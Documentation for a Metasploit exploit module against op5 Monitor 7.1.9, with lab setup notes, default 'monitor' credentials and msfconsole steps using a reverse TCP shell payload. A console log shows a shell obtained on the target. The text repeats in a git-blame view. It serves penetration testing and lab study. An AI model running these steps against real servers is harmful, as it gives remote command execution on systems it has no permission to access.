documentation/modules/exploit/linux/http/op5_config_exec.md

## Vulnerable Application

  Official Source: [op5.com](https://www.op5.com/blog/wpfb-file/op5-monitor-7-1-9-20160303-tar-gz/)
  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

### Creating A Testing Environment

Just a few quick notes on setting up a vulnerable lab with this software.

  1. The vulnerable version only installs on CentOS 6.x (author used 6.0 final)
  2. Within `php.ini`, `date.timezone = "America/New York"` to `date.timezone = "America/New_York"` if you get php errors
  3. You may need to register for a free license via an email challenge/verification

## Verification Steps

  1. Install the software, RHEL/CENTOS required (tested on CentOS 6)
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/op5_config_exec```
  4. Do: ```set payload linux/x86/shell/reverse_tcp```
  5. Do: ```set rhost 192.168.2.31```
  6. Do: ```set lhost 192.168.2.229```
  7. Do: ```exploit```
  8. You should get a shell.

## Options

  **PASSWORD**

  Password is 'monitor' by default.

  **USERNAME**

  Documentation was unclear on this.  Installing just the app, the
  username was 'monitor' by default.  However it looks like if you
  install the appliance it may be 'root'

## Scenarios

  ```
    msf > use exploit/linux/http/op5_config_exec 
    msf exploit(op5_config_exec) > set verbose true
    verbose => true
    msf exploit(op5_config_exec) > set payload linux/x86/shell/reverse_tcp
    payload => linux/x86/shell/reverse_tcp
    msf exploit(op5_config_exec) > set rhost 192.168.2.31
    rhost => 192.168.2.31
    msf exploit(op5_config_exec) > set lhost 192.168.2.229
    lhost => 192.168.2.229
    msf exploit(op5_config_exec) > check
    
    [+] Version Detected: 7.1.9
    [+] The target is vulnerable.
    msf exploit(op5_config_exec) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.229:4444 
    [*] Sending stage (36 bytes) to 192.168.2.31
    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.31:52552) at 2016-06-01 14:38:41 -0400
    [*] Command Stager progress - 100.00% done (832/832 bytes)
    whoami
    monitor
    id
    uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0
  ```
op5 config exec 2016-06-01 15:07:31 -04:00			`## Vulnerable Application`

			`Official Source: [op5.com](https://www.op5.com/blog/wpfb-file/op5-monitor-7-1-9-20160303-tar-gz/)`
			`Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)`

fixes all previously identified issues 2016-06-15 20:58:04 -04:00			`### Creating A Testing Environment`

			`Just a few quick notes on setting up a vulnerable lab with this software.`

			`1. The vulnerable version only installs on CentOS 6.x (author used 6.0 final)`
			2. Within `php.ini`, `date.timezone = "America/New York"` to `date.timezone = "America/New_York"` if you get php errors
			`3. You may need to register for a free license via an email challenge/verification`

op5 config exec 2016-06-01 15:07:31 -04:00			`## Verification Steps`

			`1. Install the software, RHEL/CENTOS required (tested on CentOS 6)`
			`2. Start msfconsole`
fixes all previously identified issues 2016-06-15 20:58:04 -04:00			3. Do: ```use exploit/linux/http/op5_config_exec```
op5 config exec 2016-06-01 15:07:31 -04:00			4. Do: ```set payload linux/x86/shell/reverse_tcp```
			5. Do: ```set rhost 192.168.2.31```
			6. Do: ```set lhost 192.168.2.229```
			7. Do: ```exploit```
			`8. You should get a shell.`

			`## Options`

			`PASSWORD`

			`Password is 'monitor' by default.`

			`USERNAME`

			`Documentation was unclear on this. Installing just the app, the`
			`username was 'monitor' by default. However it looks like if you`
			`install the appliance it may be 'root'`

			`## Scenarios`

			```
			`msf > use exploit/linux/http/op5_config_exec`
			`msf exploit(op5_config_exec) > set verbose true`
			`verbose => true`
			`msf exploit(op5_config_exec) > set payload linux/x86/shell/reverse_tcp`
			`payload => linux/x86/shell/reverse_tcp`
			`msf exploit(op5_config_exec) > set rhost 192.168.2.31`
			`rhost => 192.168.2.31`
			`msf exploit(op5_config_exec) > set lhost 192.168.2.229`
			`lhost => 192.168.2.229`
			`msf exploit(op5_config_exec) > check`

			`[+] Version Detected: 7.1.9`
			`[+] The target is vulnerable.`
			`msf exploit(op5_config_exec) > exploit`

			`[*] Started reverse TCP handler on 192.168.2.229:4444`
			`[*] Sending stage (36 bytes) to 192.168.2.31`
			`[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.31:52552) at 2016-06-01 14:38:41 -0400`
			`[*] Command Stager progress - 100.00% done (832/832 bytes)`
			`whoami`
			`monitor`
			`id`
			`uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0`
			```